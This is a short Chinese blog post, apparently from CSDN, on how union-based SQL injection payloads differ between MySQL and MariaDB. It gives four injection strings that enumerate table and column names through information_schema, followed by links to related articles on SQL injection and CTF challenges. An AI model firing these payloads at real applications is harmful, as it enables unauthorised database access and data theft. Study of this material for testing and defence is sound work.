Union联合注入在MySQL和MariaDB应用中的区别

最新推荐文章于 2024-08-14 18:35:55 发布
最新推荐文章于 2024-08-14 18:35:55 发布
阅读量506 收藏 8
点赞数 8
文章标签: mysql mariadb 数据库 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a1_pha/article/details/135856800
版权
本文介绍了如何在联合注入攻击中,通过构造SQL语句利用information_schema表获取不同数据库(MySQL和MariaDB)中的表名、列名。给出了针对特定数据库的示例,展示了攻击者如何利用这种差异获取敏感信息。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

在联合注入过程中,通过构造查询语句对information_schema表的查询,可以获得数据库的表名,列名等信息,但是在不同的数据库中,information_schema中列的名称有区别。假设注入点的列数为3,注入信息可为‘1’, 闭合方式是单引号,下面给出联合注入语句示例:

MySQL

1' union select 1,2,table_name from information_schema.tables where table_schema=database() #
1' union select 1,2,column_name from information_schema.columns where table_name='users' #

MariaDB

1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() #
1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' #

oneynhongx
关注
MySQL UNIONUNION ALL 的区别及实例分析
BjmmVue的博客
10-01 100
MySQL中,UNION UNION ALL 是用于合并多个SELECT语句结果集的操作符。本文将详细解释MySQLUNIONUNION ALL的区别,并提供相应的示例代码。UNIONUNION ALL是MySQL中用于合并查询结果集的操作符。UNION ALL操作符将两个查询的结果合并,并包括了重复的行。UNION操作符将两个查询的结果合并,并去除了重复的行。在选择使用UNION还是UNION ALL时,需要根据具体的需求数据情况进行权衡决策。在上面的示例中,我们从。
SQL注入——联合查询union
Cwillchris的博客
06-02 739
SQL注入联合查询超详细原理讲解
sql注入union联合注入_sql注入union
2401_83739411的博客
04-12 1334
1、如果都报错,则为整形闭合。2、如果单引号报错,双引号不报错。然后尝试?id=1 –– 无报错则单引号闭合。报错则单引号加括号。3、如果单引号不报错,双引号报错。然后尝试?id=1"––无报错则双引号闭合。报错则双引号加括号。4、判断真值的方法是指通过构造一个条件语句,利用应用程序返回的结果来判断闭合方式如果是没有报错回显的情况,则可以用判断真值的方法来判断闭合方式。例如:输入index.php?id=1’,页面显示错误再输入index.php?id=1’ --+,页面显示正确。
漏洞篇(SQL注入二)
m0_58001548的博客
03-28 933
1、基于布尔的盲注length 函数的使用方法:用于在 MySQL 中计算字段的长度,一个汉字是算 3 个字符,一个数字或字母算 1 个字符。由以上的返回结果可以看到可以正常执行。下面进行 sql 注入:Less-8 到 Less10 都是 GET 方式的盲注,只是闭合的方式不太一样。我们通过构造一个判断条件判断目标是否满足条件,满足条件则执行成功,不满足则执行失败。database()是当前数据库名称length(database())取出数据库名称的长度。
SQL注入-SQL数据库操作基础
tbygadgjsad的博客
02-13 1341
一、MySQL(MariaDB)基础操作 1.连接数据库 输入命令:mysql -u root -p 出现enter password:提示,由于root密码为空,可直接回车登录 出现下图 2.显示系统中所有数据库的名称 接着输入:show databases; 注意:绝大多数SQL命令都以分号作为结束符,请不要遗漏。 3.新建数据库student 命令: create databse student; 建立成功后,可再次使用show databases;命令查询。..
无涯教程-MariaDB - Union语句
无涯教程
07-03 303
MariaDB数据库中,UNION运算符用于合并两个或多个SELECT语句的结果集。它删除各种SELECT语句之间的重复行。
python操作mysql/mariadb
紫陌翌晨
07-20 1350
一、本地开发环境搭建 1.1、环境配置 安装python3 安装pycharm集成开发环境 安装python依赖(连接器) 官方提供:兼容性好 第三方开源:同时适合mysqlmariadb 1.2、官方连接器 mysql 官方连接器(Connector/Python):pip install mysql-connector-python 下载链接地址:https://dev.mysql.com/downloads/connector/python/ mariadb 官方连接器(Conne
渗透之SQL注入-MYSQL常用语法
时光
07-13 1513
渗透测试之sql注入mysql的基本用法
SWPU2019 Web1(无列名注入MariaDB)
weixin_52780973的博客
10-31 1232
sql注入、无列名注入MariaDB
sql注入获取mysql版本信息_这可能是最全的SQL注入总结,很有用
weixin_28936857的博客
02-22 2698
SQL注入原理当客户端提交的数据未作处理或转义直接带入数据库,就造成了sql注入。攻击者通过构造不同的sql语句来实现对数据库的任意操作。SQL注入的分类按变量类型分:数字型字符型按HTTP提交方式分:POST注入、GET注入Cookie注入注入方式分:布尔注入联合注入、多语句注入、报错注入、延时注入、内联注入数据库类型分:sql:oracle、MySQL、mssql、access、sq...
BUUCTF:[SWPU2019]Web1 sql注入 MariaDB注入--无列名注入-group_concat ---- /**/---group by ----- 3.9修改
Zero_Adam的博客
02-24 4759
目录:一、自己做:二、不足&&学到的:三、学习WP1.测试看看过滤了那些关键字,(这里要多看看,学学)2.使用无列名注入:这里稍停一下:3.下面学习无列名注入: 无列名注入详解:无列名注入详解 参考自:本题目的详解 写博客只是为了输出学习而已, 无他 一、自己做: 发现了 那个广告的地方可能有漏洞 二、不足&&学到的: 尝试了ssti。却忘记了尝试sql注入。。。 过滤了order的时候,可以用group by 来测试有多少行 单引号闭合,正常闭合会出错的话,可以,
无涯教程-MariaDB - Union All语句
无涯教程
07-03 266
MariaDB UNION ALL运算符与UNION运算符相同,但不会删除重复的记录。它返回查询中的所有行,并且不会删除各个SELECT语句之间的重复行。UNION ALL。
数据库连接查询
weixin_42795092的博客
04-08 2385
一、联合查询1.使用 union 连接两个 select 语句进行联合查询select 列 1,列 2... from 表名 where 条件 union select 列 1,列 2... from 表名 where 条件;select vend_id,prod_id,prod_name,prod_price from products where prod_price <= 5 union select vend_id,prod_id,prod_name,prod_price from products
sql注入初探
小小鱼的博客
09-14 1829
了解漏洞: 什么是sql注入漏洞: 攻击者可以通过该漏洞提交一段数据库查询代码,根据程序返回的结果,获得非法数据。 分析漏洞原理: SQL注入产生的原因是什么: 程序员在编写代码的时候,没有对用户输入内容的合法性进行判断。 一个系统存在这个漏洞会导致什么后果? 数据库中的信息将会被黑客获取,如果数据库权限设置不当,还可能被攻击者获取写权限,写入一句话木马。 漏洞的复现利用 环境...
[网鼎杯2018}fakebook靶场思路,MariaDB注入,通关教程前言
xt350488的博客
08-14 1167
Tips:更多优质【网络安全】文章主页。
SQL高级优化
淡若清风
01-05 383
知识回顾: 1)git版本控制工具,主要管理项目的代码文件 它相比CVS、SVN它特点,可支持分布式、外网、离线工作 主流代码管理工具 2)基本概念 工作空间 本地索引 本地仓库 远程仓库 就体积而言:远程仓库>本地仓库>工作空间 3)操作 把代码放在远程仓库上(上传) 把远程仓库上的代码获取(下载) 网盘的差异: 1)网盘只是简单的复制文件,git管理文件,可以是一个链接 2)网盘文件之间没有依赖关系或者说没有具体联系,代码关系。 3)文件本质是一个一个,代码是一个项目 4)网盘是没有分支
MariaDB 连接查询与子查询(6)
weixin_30508309的博客
12-26 455
MariaDB数据库管理系统是MySQL的一个分支,主要由开源社区在维护,采用GPL授权许可MariaDB的目的是完全兼容MySQL,包括API命令行,MySQL由于现在闭源了,而能轻松成为MySQL的代替品.在存储引擎方面,使用XtraDB来代替MySQL的InnoDB,MariaDBMySQL的创始人Michael Widenius主导开发,他早前曾以10亿美元的价格,将自己创建的公司My...
mysql in sql注入_mysqlMariaDb SQL注入
weixin_35972199的博客
01-27 1737
EDIT: This is being done on Hack The Box so no nasty illegal stuffgoing on.好吧,让我们玩得开心吧.当我看到错误消息DEBUG INFO: You have an error in your SQL syntax; check the manualthat corresponds to your MariaDB server...
渗透攻防web篇-sql注入攻击中级
煮酒闲谈
08-05 4084
Preface 找到SQL注入漏洞后,我们可以用它来干什么呢?那么本篇文章给大家带来的就是SQL注入漏洞利用技术,现在是时候让我们去体验一下漏洞利用的乐趣了。 目录 第三节 利用SQL注入 3.1 识别数据库3.2 UINON语句提取数据3.3 枚举数据库3.4 窃取哈希可令3.5 获取WebShell 第四节 SQL盲注利用 4.1 初识SQL盲注4.2 SQL盲注入技术
buuctf web入门 sql注入
最新发布
01-24
为了确保构造的恶意输入不会引起SQL语句结构破坏而导致执行失败,在输入字符串后面加上注释符号(如 `--+` 或者 `/* */`),可以有效屏蔽掉原始查询中的其余部分,从而避免潜在的语法错误[^3]。 ```sql -- 示例:...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值